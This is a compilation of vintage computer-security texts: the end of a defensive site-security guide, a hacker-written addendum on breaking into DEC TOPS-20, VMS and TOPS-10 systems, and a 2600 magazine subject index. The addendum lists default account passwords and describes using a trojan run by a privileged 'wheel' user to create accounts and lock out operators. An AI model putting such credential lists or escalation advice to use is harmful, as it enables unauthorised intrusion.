protected area an periodically comparing the stored checksum
with those computed from the file’s current contents is a
common and moderately effective way to detect the alteration
of system files.
Source Comparisons. Rather than just using a checksum the
complete files may be compared against a known set of
sources. This requires a greater storage commitment.

File Properties. Rather the computing a checksum, some facility
store certain attributes of files. Among these are the
length and location on the physical disk. While these
characteristics are easy to preserve, the naive attacker may
not know that they are important.

Read-Only Devices. Where practical, the system sources should be
stored on a device that does not permit writing. On many
system disk partitions may be mounted as “Read-Only.”
Dates. On many systems the last modification date of each file is
stored and recent modifications of system files are reported
to the system administrator.

Refresh. Some system automatically re-install system software
onto there machines on a regular basis. Users of TRACK
often do this daily to assure that systems have not be
corrupted.

55

F The Joy of Broadcast

The majority of the local area nets (LAN’s) use a system called
broadcast. It is somewhat like screaming in a crowded room.
Each person tends to try to ignore messages that weren’t meant
for them.

In this type of environment, eaves-dropping is undetectable.
Often passwords are sent unencrypted between machines. Such
passwords are fair game to an attacker.

Various cryptographic solutions including digital signature and
one time keys have been used to combat this problem. Kerberos,
developed at the MIT Athena project is available without cost and
presents one of the few promising potential solutions to the
broadcast problem.

56

G Guest Accounts

The computer center guest policy is among the most hotly debated
topics at many computer centers. From a security standpoint, it
should be obvious that an attacker who has access to a guest
account can break into a computer facility more easily.

G.1 Attack Difficulty Ratios

Basically it is a factor of ten easier to break into a machine
where you can easily get as far as a login prompt that one where
you can’t. Being able to reach the machine through a standard
networking discipline and open connections to the daemons is
worth another order of magnitude. Access to a machine that is
run by the same group is worth another factor of three and access
to a machine on the same LAN would grant a factor of three beyond
that. Having a guest account on the target machine makes the
attack still another order of magnitude easier.

Essentially, having a guest account on the target simplifies an
attack at least a thousand fold from having to start cold.

G.2 Individual Sponsors

I strongly suggest requiring each guest to have an individual
staff sponsor who takes responsibility for the actions of his
guest.

G.3 The No Guest Policy

In centers that prohibit guests, staff members often share their
passwords with their guests. Since these are generally
privileged accounts, this is a significant danger.

57

H Orange Book

You have doubtlessly by now heard of the “Orange Book” and
perhaps of the whole rainbow series.

Much of the “Orange Book” discusses discretionary and mandatory
protection mechanism and security labeling. Another section
deals with “covert channels” for data to leak out. While most
of these issues are not important in a university, the ideas of
protecting password files (even when encrypted), individual
accountability of users and password aging are worth implementing
in an unclassified environment.

58

I Acknowledgements

— Help of a lot of people. — copies were sent out to 48 people
for peer review

Jerry Carlin. For examples from his training course.
Joe Carlson. For help with spelling and grammar.

James Ellis. For help with organization.

Alan Fedeli.
Paul Holbrook. For help getting this document distributed.

David Muir. For help with spelling, grammar and comments about
computer games.

Kevin Oberman. For help with VMS issues, spelling and grammar.
Mike Odawa. For help with the microcomputers section.

59

An Addendum to A Novice’s Guide to Hacking, by The Mentor

This file is an addendum to "A Novice's Guide To Hacking" written by "The
Mentor".  The word "hacking" is here used the way the non-hacking public
thinks it is used, to mean breaking into somebody else's computer.  Its
purpose is to expand and clarify the information about the TOPS-20 operating
system, which runs on DECsystem-20 mainframes.  The Mentor basically lumped
this system in with TOPS-10 and didn't note important differences between the
two.  I will here reproduce in full what The Mentor had to say about TOPS-10
and about VMS, which are the parent and the offspring of TOPS-20.

VMS-       The VAX computer is made by Digital Equipment Corporation (DEC),
           and runs the VMS (Virtual Memory System) operating system.
           VMS is characterized by the 'Username:' prompt.  It will not tell
           you if you've entered a valid username or not, and will disconnect
           you after three bad login attempts.  It also keeps track of all
           failed login attempts and informs the owner of the account next time
           s/he logs in how many bad login attempts were made on the account.
           It is one of the most secure operating systems around from the
           outside, but once you're in there are many things that you can do
           to circumvent system security.  The VAX also has the best set of
           help files in the world.  Just type HELP and read to your heart's
           content.
           Common Accounts/Defaults:  [username: password [[,password]] ]
           SYSTEM:     OPERATOR or MANAGER or SYSTEM or SYSLIB
           OPERATOR:   OPERATOR
           SYSTEST:    UETP
           SYSMAINT:   SYSMAINT or SERVICE or DIGITAL
           FIELD:      FIELD or SERVICE
           GUEST:      GUEST or unpassworded
           DEMO:       DEMO  or unpassworded
           DECNET:     DECNET

DEC-10-    An earlier line of DEC computer equipment, running the TOPS-10
           operating system.  These machines are recognized by their
           '.' prompt.  The DEC-10/20 series are remarkably hacker-friendly,
           allowing you to enter several important commands without ever
           logging into the system.  Accounts are in the format [xxx,yyy] where
           xxx and yyy are integers.  You can get a listing of the accounts and
           the process names of everyone on the system before logging in with
           the command .systat (for SYstem STATus).  If you seen an account
           that reads [234,1001]   BOB JONES, it might be wise to try BOB or
           JONES or both for a password on this account.  To login, you type
           .login xxx,yyy  and then type the password when prompted for it.
           The system will allow you unlimited tries at an account, and does
           not keep records of bad login attempts.  It will also inform you
           if the UIC you're trying (UIC = User Identification Code, 1,2 for
           example) is bad.
           Common Accounts/Defaults:
           1,2:        SYSLIB or OPERATOR or MANAGER
           2,7:        MAINTAIN
           5,30:       GAMES

**** note:  I'm remembering this stuff from several years ago, and in some
cases my memory may be foggy or stuff may be outdated.

TOPS-20, once you are inside, resembles VMS much more than it resembles  
TOPS-10, as far as I know (I'm not really familiar with VMS).  From the
outside, it's more like TOPS-10, except that the prompt is a @ instead of a
period.  You can enter many commands without logging in, including SYSTAT and
probably FINGER.  (Sometimes you can even use the mail program without
logging in.)  It is very helpful.  Not only does the command HELP lead to
lots of useful information, but anywhere in typing a command you can press ?
and it will tell you what the format of the command expects.  For instance,
if you type ? by itself, it will tell you all the words that a command can
begin with.  If you type S?, it will tell you all the commands that start
with the letter S.  If you type SYSTAT ?, it will tell you the options
available on the systat command.  You can use this at any point in any
command.  Furthermore, if there is only one possibility (you have typed a
unique abbreviation), you can press Escape and it will finish the word for
you.  I'm not sure, but I think TOPS-20 was the system that first introduced
filename completion as well --turning a uniquely abbreviated filename into a
complete name when you press escape, beeping if the abbreviation is not
unique.  With command keywords you can leave the abbreviation un-expanded,
with filenames you have to expand it (or type it all in) for it to work.

Use the "Login" command to log in, followed by a username.  It will prompt
for a password.  Note that a password can be something like 39 characters
long, as can the username itself.  TOPS-20 does NOT use numbers like 317,043
for user IDs.  (Note that these numbers in TOPS-10 are octal, not decimal.) 
Furthermore, the password can contain spaces.  So, if somebody wants to make
his password difficult to guess, he can easily do so.

(But sometimes they might get overconfident.  I remember a story from
Stanford...  Someone asked the large cheese if he would let him know what the
operator password was, and he said "The operator password is currently
unavailable."  So the guy tried "currently unavailable" as a password, and
got in.  (Which reminds me of the time they got a real bug in the system
there...  a head crash caused by an ant on the disk platter.))

In general, TOPS-20 does not limit the number of login attempts, nor does it
keep a record of bad tries.  However, it is not difficult for the local
management to add such measures, or others such as a delay of several seconds
after each attempt.  And unlike Unix, it is difficult to evade these even
once you're in.  Without heavy in-depth knowledge, you can't test a username-
password combination except through a system call, which will enforce delays
and limited failures and such against password-trying programs.

So, TOPS-20 is easy to defend against the "database hack", in which you try
many different common passwords with many different usernames.  (Unix is
much more vulnerable to this.)  But any particular system, especially a lax
one like a college machine (DEC is always popular in academia), might have
little defense here.  But you might not know how much defense until too late.

Do try the GUEST username.

But TOPS-20 can be very vulnerable to trojan horses.  See, there's this thing
called the Wheel bit.  A username that has the Wheel property can do anything
the system operator can do, such as ignore file protection masks, edit the
disks at the track/sector level, change any area of memory...  On Unix, only
one user, the superuser, can read and write protected files.  On TOPS-20, any
user can do these things from any terminal, if the Wheel attribute is set in
his user data.  Some campus computers tend to accumulate excess trusted users
with wheel bits, and have to periodically prune away the unnecessary ones.

The thing is that a wheel can do these things without knowing that he has
done them.  Normally the privileged commands are deactivated.  But a program
run by a wheel can activate the privileges, do anything it wants, cover its
tracks, and deactivate them without the user ever being the wiser.  So if you
can get any wheel user to run any program you wrote, such as a game or small
utility...  there's no limit to what you can do.  In particular, you can
create a new username, and make it a wheel.  Or you can simply ask the system
outright for someone's password, if I'm not mistaken.  (All this requires
access to TOPS-20 programming manuals, but some of the necessary material
should be available on line.)  You cannot actually conceal this creation, as
far as I know...  but maybe with sophisticated enough knowledge you could
make it not immediately apparent...  Anyway, once you get that far in, you can
probably keep one step ahead of them for a while...  If they erase your new
accounts, you can use the passwords to old ones...  They can change all of
the wheel passwords, but a lot of the regular users won't change for some
time...  You could even lock the operators out of their own system by
changing all their passwords for them, if you were crazy enough, perhaps
forcing them to shut the machine down to regain control of it.  They might
even have to restore stuff from tape backup.

Even if you don't wedge your way into secret stuff, a TOPS-20 system can be
fun to explore.  It's much more novice-friendly than most systems, and much
more hacker-friendly as well.  I think the ascendency of Unix as the least-
common-denominator OS that everybody can agree on is a definite loss,
compared to TOPS-20.

2600 Subject Index Volumes 1 (1984) – 10 (1993) by David Price

2600 Subject Index Volumes 1 (1984) - 10 (1993)
David Price

Subjects are shown in the first column, citations are listed in the
second column using the following format: 
V(N):P  V = Volume, N = Number, P = Page

(L) Indicates a letter

00                              4(9):6
10698                           7(1):30(L)
(201)                           6(2):20
202 bug                         3(9):65
2600 Magazine                   1(1):1, 2(8):51, 4(12):3
2600 meetings                   10(2):17, 10(2):16, 10(4):35, 7(1):38,
                                10(1):43, 10(3):18, 9(4):4 
2600--voice bbs                 9(3):40(L)
2600--BBS                       2(2):9, 2(8):49
4TEL                            6(3):20
(516)                           5(3):14
540s                            8(1):19
550 blocking                    4(11):8
"606 Emergency"                 5(1):24(L)
6.5536 crystal                  7(3):32
*69                             9(2):31
(707)                           7(1):44
800s                            6(1):12, 2(6):37, 6(1):12
800--DTMF recognition           3(12):92(L)
800--tariffs                    2(1):4(L)
800--translation table          6(1):12
8038 chip                       4(12):22(L), 4(10):12(L)
900s                            2(11):79
900 translation table           6(1):12
911                             1(10):57, 7(1):37, 
911--documents                  7(2):4
959 Numbers                     4(5):8
97*s                            4(10):4
976 scam                        4(7):8
976 social interactions         4(12):17
9999-suffixes                   1(1):4
access                          3(11):84(L)
ACD                             9(3):28(L)
ACM SIGSOFT                     4(11):13(L)
acronym maker                   4(1):13(L)
acronyms                        10(1):34, 10(2):20, 2(2):11, 10(3):44,
                                8(1):42
ACTS                            6(1):30, 1(11):62
ADS                             1(9):53, 1(5):2, 1(1):2 
ADS--Investigation              1(2):9
Albania                         7(1):23
Allah Akbar!                    3(11):86
Allnet                          5(2):2, 4(6):4
alliance                        2(5):26
American Express--hacking       3(3):17
AmiExpress--hacking             9(3):4
ANAC Guide                      7(3):39
ANI Hunting                     4(1):18(L), 3 (11):84
ANSI Bomb                       10(2):44
answer supervision              3(9):65
anti-hacker propaganda          2(1):1, 7(2):11
AOS                             5(3):10
Approaching Zero Book Review    10(3):38
ARAPANet                        1(6):1
Area Code Expansion             1(3):3
ARPANet military subnet         1(3):5
Arpanet                         4(9):4
arrests...see busts
AT&T Break-up                   1(6):4, 2(11):74
AT&T failure                    6(4):4
AT&T Shutdown                   6(4):4
AT&T Strike                     1(4):1
AT&T Thought Police             2(11):79
ATM III                         4(6):12(L)
ATMs                            1(4):3, 4(7):8
ATMs, Book Reviews              4(2):21
atomic bomb                     1(3):4
ATT Addresses                   9(4):36
Australian phone system         9(1):31
Automatic Call Distributor      9(3):28(L)
AUTOVON                         3(5):37, 4(6):18(L), 3(3):17, 6(1):7, 9(4):19
baby bells                      1(7):3
back doors                      2(1):2
bank records                    1(5):3, 2(7):42
BASIC                           3(1):5
BASIC dialer program            5(1):20
basic phreaking Q & A           6(2):29(L)
BASIC Red Box Tones             5(3):22
basic terms                     4(5):13(L)
BBS Disclaimers                 4(7):12(L), 4(10):16
BBS--Government                 10(2):39
BBS--Protecting a User Log      3(2):16(L)
beepers                         4(11):12(L)
Bell computers                  9(4):42
Bell Routing Codes              5(1):42
Bellco cops                     5(1):22
Bellcore Publications           3(5):36
Best Boast                      5(1):24(L)
Big Brother                     3(12):91, 9(1):42, 8(4):8, 1(12):68, 7(3):16,
                                1(8):44
billing signals                 3(9):65
BIN list                        8(2):31
BITnet                          2(1):6, 4(9):4
black band                      4(11):7
BLV (Busy Line Verification)    5(3):27(L), 8(4):42, 4(12):10
bogus tap-check number myth     4(2):13(L)
Box--Beige                      5(4):42, 10(1):14, 10(3):9
Box--Blue                       3(2):12 (L), 2(10):69, 9(4):33, 2(2):7,
                                3(5):36 (L), 10(3):9, 6(1):25 (L), 3(5):38
Box--Clear                      1(7):4
Box--Combo                      9(3):13
Box--General info               10(3):9, 5(1):16
Box--Green                      7(1):29 (L), 10(3):9
Box--Rainbow                    10(3):9, 9(2):15
Box--Red                        5(2):13, 10(2):42, 7(3):32, 8(3):43, 10(3):9
                                9(3):13
Box--Silver in U.K.             7(1):19
Box--Silver                     6(4):20, 9(4):19, 9(1):16, 10(3):9, 1(11):64
                                (L), 3(3):17
Box--White                      2(4):19, 10(3):9
Box--yellow                     10(3):9
braille computer                3(12):95
British Telecom                 8(2):35
British Payphones               4(10):17(L)
busts                           4(3):18, 4(7):18 (L), 6(2):26 (L), 4(7):6,
                                2(5):27, 1(7):7, 3(12):91, 2(2):9, 8(4):36,
                                1(10):55, 10(4):4, 8(3):4, 7(3):44, 8(2):4,
                                4(8):3, 8(4):8, 7(3):10, 7(1):3, 6(1):3,
                                8(1):11, 8(2):12, 8(1):11, 6(2):34, 9(2):22
Busy Line Verification...see BLV
busy                            10(4):9
busy--"fast busy tones"         5(2):27(L)
busy--busy verification         3(10):80(L)
cable descrambling              10(1):16, 3(8):63
cable vaults                    7(4):12
Call Forwarding, Diverting      2(10):65
Call-Waiting Phone Tap          6(3):27
callback verification           9(3):9
Caller ID                       3(12):91, 8(1):19, 9(2):18, 7(3):5, 10(3):12,
                                8(2):22, 8(2):35
Caller ID--and Cell Phones      10(3):42
calling ards                    1(4):3, 1(6):3, 1(1):3, 1(2):9
call records (ESS)              1(2):8
call traces (ESS)               1(2):8
canning                         3(10):76(L), 5(4):42
Captain Crunch                  4(3):4
Captain Midnight                3(9):68(L)
Captain Zap's sins              5(2):24(L)
card copiers                    8(2):7
Carrier Access Codes            6(3):42
CCCP                            3(3):23
CCIS                            4(11):12(L), 2(2):7, 4(5):6
CCITT                           9(2):10
CD-ROM                          3(12):95
cellular biopsy                 10(4):6
cellular fraud bust             4(4):8
cell frequencies                4(1):10, 10(1):4, 4(7):13(L)
cellular modem                  3(5):35
cellular phones                 2(11):79, 5(3):8, 10(4):6, 4(6):8, 3(12):89,
                                4(2):13(L), 4(2):8, 10(3):42, 4(7):4,
                                3(11):90, 10(1):4
cellular phones--history        3(11):90
Central Offices                 2(3):14, 7(4):12
Central Office IDs              4(10):14
Chaos Computer Club             5(4):34
China                           3(8):63
Chinese dial-a-narc             6(2):35
CIA                             1(12):68, 1(8):46(L)
Carrier Identification  Codes   1(11):65
CIC                             7(1):8
CID... see Caller ID 
ciphers                         9(4):6
CLASS features                  8(4):31, 8(2):22, 4(5):6 
CLLI codes                      4(10):14
CN/A                            3(9):72(L), 4(8):12, 2(3):18, 
CNA--Lists                      4(4):10
CND                             8(2):22
CO Magazine                     4(9):22
COCOTS                          6(4)27(L), 7(2):20, 7(4):27(L), 8(2):28
                                (L), 8(3):25(L), 9(3):13, 8(1):19, 4(11):8
                                8(2):35 
COCOT--database list            8(4):33 
COCOT--numbers                  8(3):22
COCOT--refund letters           8(4):33
COCOT--tricks                   7(3):27(L)
codes                           9(4):6
codes--methods                  1(3):2
coin boxes                      5(3):10
coin-test number                4(4):20(L)
COLTs                           6(3):20
commentary                      2(8):50
Common Language Location Identifer...see CLLI
Communications Fraud Control 
 Association                    7(4):43
competition                     6(3):3
Compuserve                      3(10):75
Computel                        2(3):15
Computel scam                   3(2):12(L), 4(4):4, 3(5):34
computer confiscation           2(8):54
computer lore                   9(2):40
computer shows                  10(4):16
computer threat                 1(6):3
conferences                     10(3):4
Congress--paranoia              10(3):4
CONSUS                          6(1):7
cop watching                    9(1):7
cordless phones                 1(1):3, 6(2):22, 7(1):19 
Cornwall, Hugo                  4(2):4
corvis hacking                  4(11):12(L)
COSMOS                          2(2):8, 6(3):13, 4(2):6, 4(3):10, 2(12):82,
                                7(1):8
COSMOS--abbreviations           4(3):10
COSMOS--demise                  6(3):13
COSMOS--documentation           4(2):6
COSMOS--history                 4(3):10
COSNIX Operating System         4(2):6
Country codes                   1(2):10, 3(7):53
couplers                        9(2):4
court news                      3(4):27, 2(4):21, 1(4):3, 1(6):3, 8(4):36,
                                1(5):3
covering tracks                 4(7):6
covert radio broadcasts         4(11):7
CPA-1000                        4(8):12(L)
credit card algorithms          7(3):42
credit files                    10(1):42
Cross-Bar--oddities             3(3):20(L)
crypt preview                   8(3):44
crypt() source code             8(4):11
current events                  3(3):22
customs                         8(2):35
"Cyberpunk" fictions            8(2):42
DAST                            10(4):22
data transmission--quality      3(9):71
DCS                             3(3):17
DEC-20--hacking                 2(7):41
(DEC)PDP                        3(4):25
Defense Communications Agency   5(1):24(L)
Defense Data Network listing    1(5):4
Denning, Dorthy                 7(3):10
Department of Justice           9(2):22
deregulation                    1(7):3
dial back security              3(2):10
Dialed Number Recorder--see DNR
dialer--demon                   9(2):15
dialer programs                 5(1):20
dialing * on rotary phones      3(12):96
dialup numbers                  4(8):6
Dicicco, Lenny                  8(2):42
digital lock combinations       10(4):38
Direct Analog Storage Technology...see DAST 
direct dialing                  4(3):8
directories                     2(5):27, 3(12):95
Directory Assistance
 --usage fees                   1(2):9
Disney radio frequencies        9(1):17
divestiture                     3(1):1
DMERT                           10(2):4, 8(4):45
DMS 100                         1(7):3(L), 10(4):10
DNIC (Data Network ID Codes)    7(1):40
DNR                             7(3):16
DOCKMASTER break in             5(3):20
DoD                             3(3):19
DSM                             6(4):14
DSS1                            10(3):36
DTMF dialers                    8(3):43
DTMF decoder                    7(1):14, 10(2):14
DTMF overview                   9(2):10
dumpster diving                 1(2):10, 2(2):8, 1(9):50
Duophone CPA-1000               4(5):22
Dutch hackers                   8(3):4
E-Card                          4(5):8
E-COM                           1(6):3, 1(6):5
EASYnet                         8(2):18
Electronic Freedom Foundation   7(2):10
Electronic Privacy Act          4(6):8, 4(4):8
electronic surveillance--NSA    2(12):83
email systems                   1(12):71
Emergency Interrupts            4(12):10
encryption                      3(4):31, 3(10):79, 2(1):3, 9(4):6
equal access                    4(5):17(L), 4(3):6, 4(3):8, 4(12):20
errata for 4(9)                 4(10):18
ESN                             10(4):6, 10(1):4, 10(3):42, 4(7):4 
espionage                       2(3):15
#1ESS                           7(4):12, 10(4):10
#4ESS                           7(4):28(L)
#5ESS switch                    10(2):4, 10(4):10, 8(4):45, 8(4):45
ESS                             3(10):79, 1(2):8, 1(6):2, 6(1):25(L),
                                2(11):74, 1(7):3, 10(4):10
ESS Bust methods                1(7):3(L)
essay                           2(12):81, 1(12):67, 7(4):32
European phone systems          4(5):9
exchanges                       3(8):62
Falwell, Jerry                  5(1):25, 5(2):39, 3(1):3
Farrell's Ice Cream-covered 
 narcs                          1(8):45
fax taps                        9(1):42
FAX                             4(5):14
ftp tricks                      8(3):14
FBI                             3(11):83, 3(10):75, 3(9):67, 1(11):63,
                                9(2):22, 1(1):2, 4(8):9, 1(1):3
FCC                             4(6):8, 3(9):71, 1(6):3
*features                       8(4):31
Feds                            9(2):38
feeder groups                   5(3):4
fiber-optics laid 
 along rails                    3(6):48(L)
finger monitor program          9(1):35
fingerprints                    3(12):95
FM wireless transmitter--plans  8(4):44
fortress fones...see pay phones 
Frame Room                      7(4):12
France                          2(12):83
gangs                           7(4):36
GBS                             4(10):4
GEISCO                          2(1):3
general phone rants             4(1):20
Germany                         2(12):87
Gore, Albert                    5(1):26(L)
grade hacking                   10(2):13, 10(4):15, 10(3):34, 6(4):45,
                                6(3):4
GTD#5                           2(11):73
GTE--Telemail                   1(1):3
GTE Telcos                      6(3):33
Gulf War printer virus          8(4):39
"Hacker"                        9(1):36
Hacker Con                      6(3):10
The Hacker Crackdown            9(3)21
hacker morality                 2(6):34
hacker scares                   9(4):4
hacker sourcebooks              1(11):64(L)
hacker study                    10(1):38
hacker video                    8(3):14
Hacker's Handbook               4(2):15, 4(2):4
hackers credo                   1(3):1, 9(4):17
hackers in hiding               8(3):24(L)
hacking beginnings              9(3):42
hacking history                 5(1):16
hacking lore                    8(4):16, 2(8):52, 5(1):24(L), 4(2):13(L)
hacking reading list            7(4):6
hacking recycling machines      1(2):9
hacking statistics              3(6):41
Hack-Tic                        9(2):15
harmonica bug                   2(9):58
HBO                             3(10):75
Hess, Mark                      7(1):45
high school hacking--news       1(3):3
history--phreaking UK           1(9):49
Hoffman, Abbie                  4(1):4
         --Obituary             6(2):3
Holland's hackers               2(4):21
home monitoring                 1(4):2
honesty tests                   10(3):20
HP2000--hacking                 2(3):20
human database centers          8(4):46
humorous defense against 
 telco threats                  2(2):10(L)
IBM                             1(1):2
IBM's Audio Distribution 
 System                         1(5):2
IC                              1(11):65
ICLID                           7(3):5
ICN                             3(11):81
IMAS                            4(10):4
IMTS                            3(4):26, 3(12):89
In-Band Signaling               2(2):7
India                           3(9):67
induction coil--plans           7(3):36
infinity transmitter            2(9):58
information manipulation        9(4):17
INSPECT                         8(2):18
Intelpost                       1(5):3
internet dialups                10(4):32
internet outdials               8(1):40
internet worm                   5(4):4, 6(3):39
Interoffice Signalling          7(4):12
intro to hacking                2(6):40
IRS                             3(2):15, 3(10):79, 2(1):3, 2(3):15, 2(6):35
ISDN                            10(3):36, 8(1):42 
Israel--phone system            2(6):33, 4(4):16
Israeli computer surveillance 
 of West Bank                   4(12):8
Italian hackers                 4(12):18
ITT 2100 switch                 4(7):12(L)
ITT--boxing                     3(5):38
I've fallen and I can't 
 get up                         3(9):67
Jackson, Steve                  10(2):45, 10(1):18
jail                            10(4):4
JANET                           4(9):4
Kenya                           2(3):15
Kiev                            3(6):47
KKK--racist BBS systems         2(1):3
Kranyak, Jack                   3(5):34, 4(4):4
Landreth, Bill                  4(9):12(L)
laptop tone generation          9(4):45
laptops                         1(2):9, 9(2):4
LASS System                     4(5):6
law enforcement--confiscation   2(8):54
LD Carriers                     4(12):20
LD Fees                         1(5):3
LEC                             8(1):42
legalistic banter               2(1):4(L)
Legislative Network             7(4):4
letter sorting machines         8(3):32, 8(4):32
lineman's handset               10(1):14
LODCOM compilation review       10(3):19
loop number patterns            4(1):12(L), 1(9):52(L)
loop testing                    6(3):20
magnetic card tricks            9(1):27, 8(4):40 (L), 8(2):7
mail drops                      7(3):29 (L)
manholes                        5(3):4, 7(4):12
Marcos                          3(4):27
marine radio ch 26              7(1):19
Marquee                         3(3):19
Max Headroom-Chicago style      4(12):8
MCI Mail--hacking               1(12):67, 1(7):2
MCI Numbers                     1(4):5
MCI scam                        5(4):10
MCI                             6(1):36, 1(3):2, 8(2):16
media hype                      8(3):4
merchant ship calls             2(6):36(L)
MF tones                        2(3):16(L)
microwave links                 1(3):2
MicoVAX                         3(9):71
military computers              5(1):24 (L)
MILNet                          2(7):45
MIN                             4(7):4
Minitel                         4(9):8, 9(4):8
missile systems                 2(4):21
Mitnick, Kevin                  7(1):3, 6(1):3, 6(3):14, 8(2):42
MIZAR                           7(1):8
mobile hacking                  9(2):4
mobile telephone freqs          6(3):24 (L), 8(4):18, 3(4):26
monitoring microwave            5(1):4
Morris, Robert                  6(3):14, 6(4):6, 7(1):23
motivation--hackers             1(3):1
MTSO                            3(12):89
MPOW                            4(5):12(L)
narcs                           9(2):38, 1(11):64(L)
National Coordinating Center    5(1):24 (L)
Navy                            3(10):75
Nazi BBS                        2(3):13
NCCCD                           3(6):41
Neidorf, Craig                  7(1):3, 7(2):4, 7(2):3, 7(2):8, 7(3):44,
                                8(4):36
neo-Nazi games                  8(2):12
net addresses                   2(4):23, 3(11):82
Network 2000                    7(3):8
news                            4(10):8, 5(1):37, 9(4):19, 4(11):8
new services                    8(2):35
non-supervised phone lines      3(6):44(L)
Nothing New in 
 Computer Underground           3(6):42
NPA count                       6(4):44
NSA                             2(10):67, 1(9):51, 2(7):47, 1(10):57,
                                3(9):67, 5(3):20, 2(12):83, 3(10):79
NSA's Phone Number              2(3):16(L)
NUAs--international             4(10):10
nuclear free America            4(3):2
numbers                         4(12):21, 5(2):44, 9(1):45
NY Tel                          4(7):15
Nynex exchange addresses        10(4):18
NYNEX                           8(2):11, 6(4):9, 6(3):36
NYNEX--Radio Frequencies        8(2):32
NYNEX--switch guide             6(4):9
obit--David Flory AKA Dan 
 Foley AKA The Shadow           6(2):45
    --Abbey Hoffman             6(2):2
operating systems..see individual entries (e.g. VM/CMS, UNIX...)
operator humor                  7(4):16
operator identification of 
 payphone                       1(2):10(L)
operator service                4(9):6
operators                       1(10):56
operators--social engineering   3(5):33
operators--USSR                 5(4):30
ouch!                           5(2):16
outages                         8(2):35
outdial list                    8(1):40, 8(2):44
"Out of the Inner Circle"       2(6):34
outside local loop 
 distribution plant             5(3):4
pagers--scanning                4(6):5
paranoia                        1(7):3, 2(1):1, 3(5):39, 8(2):4, 2(8):50,
                                1(7):1, 9(4):4
parking summons                 1(7):3
password grabber                3(8):60(L)
passwords                       4(9):14, 8(1):36, 9(3):31, 4(8):10,
                                4(5):4
passwords--common               9(3):31
passwords--hacking IBMs         8(1):36
passwords--UNIX                 8(1):31
pay phones                      6(1):30, 1(11):62, 6(3):37, 1(2):10
pay phone--destruction          3(10):73
pay phone--dissection           3(10):73, 9(1):20
PBX trix                        4(1):12(L)
PC Pursuit                      2(9):58
PC Pursuit--hacking             4(4):6
PC-Pursuit--outdial list        8(2):44
PDP-11                          2(11):73
Pen registers                   3(2):11, 4(9):13, 4(12):12(L), 4(5):22
Pentagon                        1(12):69
People Express                  2(5):25
pet cemeteries                  8(2):35 
Phiber Optik                    10(4):4
phone directories of the World  4(4):16
phone frequencies               5(4):19
phone interception              5(1):4
phone news                      9(2):19
phone numbers                   8(1):17
Phoenix Project                 7(1):3
Phrack                          7(1):3, 7(2):3, 7(2):4, 7(2):8, 8(1):11,
                                8(4):36, 9(2):22 
phreak anticdotes               1(9):52
phreak history                  2(11):80, 5(3):9
phreak typologies               2(3):13
phreaking overview              9(2):10
Pick operating system           3(6):42
pink noise                      2(2):7
PINs                            4(11):8
pirate radio                    6(2):42
Pitcairn Island                 2(9):59
PKZIP BBS hack method           9(1):12
plane phones                    1(11):63
poetry                          4(8):20, 4(3):4
police computers                2(5):27
police setups                   3(4):30
police surveillance             1(8):44
political hacking               7(4):4
porn                            2(6):35
postal paranoia                 4(3):12(L), 1(4):20(L)
POSTNET                         8(4):21, 8(3):32
PRIMOS                          7(2):14, 6(2):4, 6(4):14
prison computers                8(4):5
prison phones                   7(3):29(L), 9(4):13
prison update                   8(2):46
privacy                         1(5):3
Privacy Act of 1974             8(3):18
Private Sector BBS              2(8):49, 2(9):59, 3(1):1, 3(3):22, 3(4):30
Prodigy censorship              6(4):43(L)
Prodigy--STAGE.DAT conspiracy   8(3):26, 8(4):29(L), 8(1):19
product list                    7(4):6
product review: Duophone 
 CPA-1000                       4(5):22
Programs--Hacking IBMs          8(1):36
PRONTO                          2(7):42
proto-phreak                    5(3):9
PSAP                            7(1):37
psychological makeups           8(3):38
psychobabble                    7(3):44
Puerto Rico                     3(10):76(L)
pyramid schemes                 3(10):79, 4(6):4
radio scanners                  6(2):22, 5(4):45
Raids...see busts  
RC channel                      10(2):4, 8(4):45
RCI                             3(9):65
RCMAC                           7(1):8
Reagan, Ron                     2(5):27, 1(12):69, 3(11):83
REMOB (Remote
 Observation)                   5(1):27(L), 2(5):28(L), 6(3):32, 7(1):24(L),
                                2(9):60(L)
resources guide                 3(6):46, 7(4):6
return call                     9(2):31
The Rise of the Computer State  1(8):44
ROLM                            6(3):24(L), 3(11):88(L)
ROLM CBX II 9000                5(1):30
Rose, Len                       8(2):12, 8(1):11
routing codes                   5(1):42
Royko, Mike                     2(11):75
RS CPA-1000                     4(5):22
RSTS                            3(4):25, 2(11):73
Russian phone books             3(5):36(L)
Russian phone numbers           3(5):36(L)
SAC                             5(3):4
Santa scam                      6(1):36
SAT                             10(1):4
satellite phone transmissions   4(11):7
satellite links                 5(1):4
satellite jamming               3(3):23
satellites--hacking myths       2(8):52
Saudi Arabia                    4(7):21, 3(10):80(L)
scams                           7(4):22, 2(4):21
scanners                        7(1):19
SCCs                            7(1):8, 7(1):37
school records                  10(2):13, 10(4):15, 10(3):34
scramblers                      1(8):46(L), 3(4):29
secret frequencies              8(2):32
Secret Service                  2(6):34, 9(4):4, 9(4):12, 9(2):38, 10(1):18,
                                10(1):43, 10(3):18 
Secret Service--radio 
 frequencies                    9(1):17
secured trunks                  6(1):24(L)
sentry security                 8(4):5
security                        8(2):18, 7(3):10
Serving Area Interface          5(3):4
Sherwood Forest--busted         2(6):34
shortwave                       3(9):67
$SHOW PROCESS/PRIV              4(1):6
Simplex corrections             8(4):21
Simplex lock location guide     9(1):38
Simplex locks                   8(3):6
SL-1 Switch                     3(9):68(L)
Smartphone hacking              10(4):11
"Sneakers"                      9(3):17
social engineering              2(3):14, 2(4):19
Social Security Number 
 prefixes                       4(11):6
South Africa                    4(10):11
South African phreaks           6(2):24(L)
SouthWestern Bell               9(4):42
Soviet Union                    8(1):16
Spain                           6(2):36
Speech Thing: product review    9(4):45
spoofing VAX login              4(8):10
Springsteen                     2(11):75
Sprint                          6(2):34
spying on 2600                  7(3):44
SS7                             10(3):12
SSNs                            3(7):51, 8(3):18
SSTs                            7(1):12
Step Offices                    1(5):1
Sterling, Bruce                 9(3)21
Steve Jackson Games             10(1):23
Stasi                           8(1):19
sting BBS's                     3(6):44(L), 3(9):66
stings                          3(5):39
Stoll, Cliff                    7(1):45
Strowger, Almon                 5(3):9
submarine cable maps            4(8):11
surveillance                    3(12):95
survey                          2(12):84, 4(8):15
Sweden's "Person Numbers"(ID)   1(3):3
SWITCH                          8(1):42
switch guide                    1(5):1, 7(4):12, 10(4):9, 10(4):10
switch overloading              3(12):91
switch-hook dialing             4(12):12(L)
switches...see specific switch
switching centers               1(10):56
switching routes                2(3):16(L)
switching systems               2(5):27
Sysops--protective measures     2(8):55
